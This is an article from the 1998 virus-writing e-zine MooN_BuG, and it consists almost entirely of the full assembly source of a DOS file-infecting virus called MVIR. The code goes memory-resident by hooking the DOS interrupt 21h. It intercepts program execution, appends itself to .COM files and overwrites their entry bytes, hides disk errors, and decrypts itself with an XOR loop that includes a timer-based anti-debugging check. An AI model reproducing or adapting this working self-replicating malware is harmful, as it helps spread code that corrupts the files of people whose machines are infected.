[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 7, Sep 1998                                           file 010

                                  Вирус MVIR
                                             by Unknown

=== Cut ==
.286
codesg segment
   assume cs:codesg
   org 100h
 begin:
     mov si,offset start
     jmp si
     db 7fh
;
; Тело зараженной  программы
;
org 200h
start:
   ; si = offset start  ;addres of first progrem block begin
   add si,offset old_byte - 200h
   ; DS==ES==CS==PSP
   ;
   mov  di,0100h
   mov cx,3 ; moving 6 byte of program
   rep movsw
 in ax,42h
 xchg ax,bx
 in ax,42h
 cmp ax,bx
 jnz anti_done
 mov cx,7f7fh
anti_done:
 mov ax,300h
 xchg cx,ax
 sub  si,offset old_byte + 6 -200h
 push si
crypt:
 xor word ptr ds:[si],ax
 inc si
loop crypt
;--------------------- Test present in memory --------------
   pop si
   mov ds,cx
   cmp word ptr ds :[Virus_ID],'lO'
   je next
;--------------------- Move Virus Body ---------------------
   push ds
   push cs
   pop  ds
   mov  di,0200h
   pop  es
;es set to 0
   mov cx,150 ;Virus Size
   rep movsw
; Сохраняем старый int 21 в перемещенном коде вируса 0:200h
;
   push es
   pop  ds
   les bx,ds:[21h*4]
   mov word ptr ds:intold,bx
   mov word ptr ds:intold+2,es
  mov dx,offset work_p
  mov ax,2521h
  int 21h
next:
   push cs
   pop ds
   push cs
   pop es
   mov di,100h
   jmp di
;---------- Старые 6 байт зараженной проги -----------------
old_byte:
  db 90h,90h,90h, 90h,90h,0c3h
;------------------ Main part of virus ---------------------
work_p:
   Pushf
   cmp ax,4b00h
   jne oldint       ;Test
   push ax
   push bx
   push cx
   push dx
   push es
   push ds
    call vmain
   pop ds
   pop es
   pop dx
   pop cx
   pop bx
   pop ax
  oldint:
   Popf
           db 0eah
    intold dd 0
;------------------------
vmain proc
   mov ax,3524h
   int 21h
   mov word ptr cs:int_24h,bx
   mov word ptr cs:int_24h+2,es
;-------------- Open file ----------------------------------

   mov ax,word ptr cs:[offset ax_3d02h - offset start +200h]
;     mov ax,3d02h

     int 21h
   jc exitv
     XCHG bx,ax

  push cs
  pop  ds
  mov dx,offset iret_pointer
  mov ax,2524h
  int 21h
                  ; Read first 4 byte of program
    mov ah,3fh ;bx :file handle;
               ; ds set to 0h
    mov dx,offset old_byte  ; хранятся старые 6 байт проги
    mov cx,6
    int 21h
    CMP WORD PTR ds:[offset old_byte],'ZM' ;Test .exe file
    je close
    cmp word ptr ds:[offset old_byte+3],0e6ffh ; Virus ID
    je close
      mov al,2       ; set fhandle to end of file
      call setfilep
     jc exitv
     cmp ax,1220
     jbe close         ; if ax<1220 then close file
     add ax,100h
     mov word ptr offset ds:root +1,ax ; Restore new value
     mov dx,200h ; Virus start
     mov cx,offset int_24h - offset start ; Тело вируса
  mov ah,byte ptr ds:[offset ah_40h - offset start +200h]
  int 21h
                                          ; + 6 Байт
     jc exitv                             ; старой проги
     cmp cx,offset int_24h - offset start ;
     jne exitv
;--------------- Add virus boot ----------------------------
      sub al,al
      call setfilep
     jc exitv
      mov cx,6
      mov dx,offset root ;adress of virus boot
  mov ah,byte ptr ds:[offset ah_40h - offset start +200h]
  int 21h
;--------------- Close file --------------------------------
   close:
    mov ah,3eh
    int 21h
 exitv:
  lds dx,cs:[int_24h]
  mov ax,2524h
  int 21h
  ret
vmain endp
setfilep proc
     mov ah,42h
     sub cx,cx
     sub dx,dx
     int 21h
     ret
setfilep endp
     Virus_ID db 'Ol'
     Num_EXEC db 0
     iret_pointer:
      mov al,3
      iret
    ah_40h   db 40h      ; Write
    ax_3d02h dw 3d02h    ; Open
;================= Загрущик вируса =========================
root:
     mov si,offset old_byte
     jmp si
     db 7fh
;===========================================================
int_24h dd 0
codesg ends
end begin
=== Cut ==